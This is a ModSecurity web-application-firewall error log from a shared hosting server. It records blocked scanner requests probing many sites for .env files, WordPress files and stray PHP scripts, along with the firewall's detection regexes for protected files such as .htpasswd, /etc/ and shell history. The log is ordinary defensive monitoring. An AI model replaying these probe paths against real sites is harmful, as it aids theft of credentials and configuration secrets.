[Tue May 26 15:04:31.523012 2026] [security2:error] [pid 678998:tid 679155] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpJ5-Rl4i_pgT-iAdiogAAABs"]
[Tue May 26 15:04:31.629790 2026] [security2:error] [pid 678998:tid 679134] [client 95.142.47.113:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVpJ5-Rl4i_pgT-iAdirwAAAAY"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1080029&moderation-hash=0e87fce109a830c284db19e55e399fb4
[Tue May 26 15:04:31.795385 2026] [security2:error] [pid 678998:tid 679218] [client 136.243.220.209:33376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpJ5-Rl4i_pgT-iAdivgAAAFo"]
[Tue May 26 15:04:32.085836 2026] [security2:error] [pid 678998:tid 679233] [client 195.2.79.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVpKJ-Rl4i_pgT-iAdixQAAAGk"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1254784&moderation-hash=cbda9e44d8e7479c14e820181a0e0571
[Tue May 26 15:04:32.540757 2026] [security2:error] [pid 678998:tid 679115] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.old"] [unique_id "ahVpKJ-Rl4i_pgT-iAdi2QAAK3Q"]
[Tue May 26 15:04:32.586564 2026] [security2:error] [pid 678998:tid 679129] [client 74.249.173.207:4315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/wp-admin/user/index.php"] [unique_id "ahVpKJ-Rl4i_pgT-iAdi4AAAAAE"]
[Tue May 26 15:04:33.872350 2026] [security2:error] [pid 678998:tid 679207] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpKZ-Rl4i_pgT-iAdi9AAAAE8"]
[Tue May 26 15:04:34.368477 2026] [security2:error] [pid 678998:tid 679008] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.prod"] [unique_id "ahVpKp-Rl4i_pgT-iAdjFQAAVgk"]
[Tue May 26 15:04:35.303863 2026] [security2:error] [pid 678998:tid 679184] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpKp-Rl4i_pgT-iAdjLQAAADg"]
[Tue May 26 15:04:35.870221 2026] [security2:error] [pid 678998:tid 679227] [client 136.243.220.209:45904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpK5-Rl4i_pgT-iAdjWAAAAGM"]
[Tue May 26 15:04:36.174221 2026] [security2:error] [pid 678998:tid 679006] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.production"] [unique_id "ahVpLJ-Rl4i_pgT-iAdjagAAIQc"]
[Tue May 26 15:04:37.008222 2026] [security2:error] [pid 678998:tid 679253] [client 114.119.139.1:62991] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVpLZ-Rl4i_pgT-iAdjhwAAAH0"], referer: http://glorodavionics.com/index.php?route=product/product&manufacturer_id=11&product_id=174&page=7
[Tue May 26 15:04:37.410452 2026] [security2:error] [pid 678998:tid 679187] [client 74.249.173.207:4299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/wp-conf.php"] [unique_id "ahVpLZ-Rl4i_pgT-iAdjmAAAADs"]
[Tue May 26 15:04:38.014814 2026] [security2:error] [pid 678998:tid 679143] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpLZ-Rl4i_pgT-iAdjoQAAAA8"]
[Tue May 26 15:04:38.024657 2026] [security2:error] [pid 678998:tid 679019] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.save"] [unique_id "ahVpLp-Rl4i_pgT-iAdjqQAAZRQ"]
[Tue May 26 15:04:38.156110 2026] [security2:error] [pid 678998:tid 679167] [client 176.65.139.238:27936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.rsmsi.svijaykumar.in"] [uri "/.env"] [unique_id "ahVpLp-Rl4i_pgT-iAdjrQAAACc"]
[Tue May 26 15:04:39.840194 2026] [security2:error] [pid 678998:tid 679026] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.staging"] [unique_id "ahVpL5-Rl4i_pgT-iAdj2AAAeRs"]
[Tue May 26 15:04:39.858798 2026] [security2:error] [pid 678998:tid 679164] [client 136.243.220.209:49313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpL5-Rl4i_pgT-iAdj2QAAACQ"]
[Tue May 26 15:04:40.345945 2026] [security2:error] [pid 678998:tid 679132] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpL5-Rl4i_pgT-iAdj3QAAAAQ"]
[Tue May 26 15:04:42.045339 2026] [security2:error] [pid 678998:tid 679145] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpMZ-Rl4i_pgT-iAdkDgAAABE"]
[Tue May 26 15:04:42.188651 2026] [security2:error] [pid 678998:tid 679030] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/api/.env"] [unique_id "ahVpMp-Rl4i_pgT-iAdkIwAAdx8"]
[Tue May 26 15:04:43.122160 2026] [security2:error] [pid 678998:tid 679187] [client 181.177.85.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVpM5-Rl4i_pgT-iAdkTAAAADs"], referer: https://www.anujtradingco.com/
[Tue May 26 15:04:43.171492 2026] [security2:error] [pid 678998:tid 679170] [client 176.65.139.231:33768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rsmsi.org.in"] [uri "/.env"] [unique_id "ahVpM5-Rl4i_pgT-iAdkVQAAACo"]
[Tue May 26 15:04:43.651597 2026] [security2:error] [pid 678998:tid 679151] [client 74.249.173.207:4303] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVpM5-Rl4i_pgT-iAdkWQAAABc"]
[Tue May 26 15:04:43.798359 2026] [security2:error] [pid 678998:tid 679194] [client 136.243.220.209:1985] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpM5-Rl4i_pgT-iAdkbAAAAEI"]
[Tue May 26 15:04:44.013884 2026] [security2:error] [pid 678998:tid 679020] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/apps/.env"] [unique_id "ahVpNJ-Rl4i_pgT-iAdkdgAAfRU"]
[Tue May 26 15:04:44.094463 2026] [security2:error] [pid 678998:tid 679149] [client 181.177.85.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVpNJ-Rl4i_pgT-iAdkdwAAABU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1470640&moderation-hash=e472e790e61b9f384f13fa9f26fb58af
[Tue May 26 15:04:44.649893 2026] [security2:error] [pid 678998:tid 679175] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpNJ-Rl4i_pgT-iAdkfQAAAC8"]
[Tue May 26 15:04:45.055253 2026] [security2:error] [pid 678998:tid 679151] [client 66.146.234.139:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVpNJ-Rl4i_pgT-iAdkmAAAABc"], referer: https://anujtradingco.com
[Tue May 26 15:04:45.955871 2026] [security2:error] [pid 678998:tid 679056] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/store/.env"] [unique_id "ahVpNZ-Rl4i_pgT-iAdkyQAAUjk"]
[Tue May 26 15:04:46.565267 2026] [security2:error] [pid 678998:tid 679242] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpNp-Rl4i_pgT-iAdk1wAAAHI"]
[Tue May 26 15:04:47.775333 2026] [security2:error] [pid 678998:tid 679082] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/blog/.env"] [unique_id "ahVpN5-Rl4i_pgT-iAdlHQAAQ1M"]
[Tue May 26 15:04:48.313128 2026] [security2:error] [pid 678998:tid 679199] [client 136.243.220.209:29145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpOJ-Rl4i_pgT-iAdlNwAAAEc"]
[Tue May 26 15:04:48.772643 2026] [security2:error] [pid 678998:tid 679230] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpOJ-Rl4i_pgT-iAdlOgAAAGY"]
[Tue May 26 15:04:49.544584 2026] [security2:error] [pid 678998:tid 679141] [client 85.204.70.118:54796] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "fonefix.in"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVpOZ-Rl4i_pgT-iAdlcAAAAA0"]
[Tue May 26 15:04:50.094959 2026] [security2:error] [pid 678998:tid 679090] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/new/.env"] [unique_id "ahVpOp-Rl4i_pgT-iAdliwAAbls"]
[Tue May 26 15:04:50.140819 2026] [security2:error] [pid 678998:tid 679212] [client 85.204.70.118:54800] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "fonefix.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVpOp-Rl4i_pgT-iAdljAAAAFQ"]
[Tue May 26 15:04:50.268129 2026] [security2:error] [pid 678998:tid 679220] [client 74.249.173.207:4290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/abc.php"] [unique_id "ahVpOp-Rl4i_pgT-iAdllAAAAFw"]
[Tue May 26 15:04:50.306146 2026] [security2:error] [pid 678998:tid 679246] [client 209.163.117.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVpOp-Rl4i_pgT-iAdlkwAAAHY"], referer: https://www.anujtradingco.com/
[Tue May 26 15:04:50.326712 2026] [security2:error] [pid 678998:tid 679221] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpOZ-Rl4i_pgT-iAdlgQAAAF0"]
[Tue May 26 15:04:50.425788 2026] [security2:error] [pid 678998:tid 679187] [client 85.204.70.118:54804] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "fonefix.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVpOp-Rl4i_pgT-iAdlnAAAADs"]
[Tue May 26 15:04:50.714465 2026] [security2:error] [pid 678998:tid 679198] [client 85.204.70.118:54818] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "fonefix.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVpOp-Rl4i_pgT-iAdlrAAAAEY"]
[Tue May 26 15:04:51.016275 2026] [security2:error] [pid 678998:tid 679149] [client 85.204.70.118:54820] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "fonefix.in"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahVpO5-Rl4i_pgT-iAdlsQAAABU"]
[Tue May 26 15:04:51.039680 2026] [security2:error] [pid 678998:tid 679089] [remote 74.7.241.58:48802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVpO5-Rl4i_pgT-iAdlswAANlo"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 15:04:51.308018 2026] [security2:error] [pid 678998:tid 679212] [client 85.204.70.118:40742] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "fonefix.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVpO5-Rl4i_pgT-iAdlvQAAAFQ"]
[Tue May 26 15:04:51.609287 2026] [security2:error] [pid 678998:tid 679246] [client 85.204.70.118:40756] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "fonefix.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVpO5-Rl4i_pgT-iAdlxQAAAHY"]
[Tue May 26 15:04:51.815254 2026] [autoindex:error] [pid 678998:tid 679243] [client 15.204.161.7:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:04:51.905274 2026] [security2:error] [pid 678998:tid 679208] [client 85.204.70.118:40762] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "fonefix.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVpO5-Rl4i_pgT-iAdlzgAAAFA"]
[Tue May 26 15:04:52.028160 2026] [security2:error] [pid 678998:tid 679108] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/old/.env"] [unique_id "ahVpPJ-Rl4i_pgT-iAdl1QAAUm0"]
[Tue May 26 15:04:52.107336 2026] [security2:error] [pid 678998:tid 679185] [client 74.249.173.207:4316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/abcd.php"] [unique_id "ahVpPJ-Rl4i_pgT-iAdl1gAAADk"]
[Tue May 26 15:04:52.200971 2026] [security2:error] [pid 678998:tid 679145] [client 85.204.70.118:40776] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "fonefix.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVpPJ-Rl4i_pgT-iAdl2AAAABE"]
[Tue May 26 15:04:52.503755 2026] [security2:error] [pid 678998:tid 679182] [client 85.204.70.118:40778] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "fonefix.in"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahVpPJ-Rl4i_pgT-iAdl4wAAADY"]
[Tue May 26 15:04:52.604945 2026] [security2:error] [pid 678998:tid 679196] [client 209.163.117.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVpPJ-Rl4i_pgT-iAdl5gAAAEQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1504737&moderation-hash=5ff62b9a2bd9413889c45083aa006a56
[Tue May 26 15:04:52.661177 2026] [security2:error] [pid 678998:tid 679205] [client 136.243.220.209:56175] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpPJ-Rl4i_pgT-iAdl8wAAAE0"]
[Tue May 26 15:04:52.801186 2026] [security2:error] [pid 678998:tid 679183] [client 85.204.70.118:40786] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "fonefix.in"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahVpPJ-Rl4i_pgT-iAdl-QAAADc"]
[Tue May 26 15:04:53.013838 2026] [security2:error] [pid 678998:tid 679137] [client 45.12.3.104:60501] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.3.12.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/images/images/cache.php"] [unique_id "ahVpPJ-Rl4i_pgT-iAdl-gAAAAk"]
[Tue May 26 15:04:53.088257 2026] [security2:error] [pid 678998:tid 679144] [client 85.204.70.118:40792] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "fonefix.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVpPZ-Rl4i_pgT-iAdmAQAAABA"]
[Tue May 26 15:04:53.101385 2026] [security2:error] [pid 678998:tid 679155] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpPJ-Rl4i_pgT-iAdl8gAAABs"]
[Tue May 26 15:04:53.335800 2026] [security2:error] [pid 678998:tid 679165] [client 153.75.250.148:53944] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-content/themes/bootstrap-ultimate/docs/thanks.php"] [unique_id "ahVpPZ-Rl4i_pgT-iAdmBwAAACU"]
[Tue May 26 15:04:53.395477 2026] [security2:error] [pid 678998:tid 679175] [client 85.204.70.118:40804] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "fonefix.in"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahVpPZ-Rl4i_pgT-iAdmCwAAAC8"]
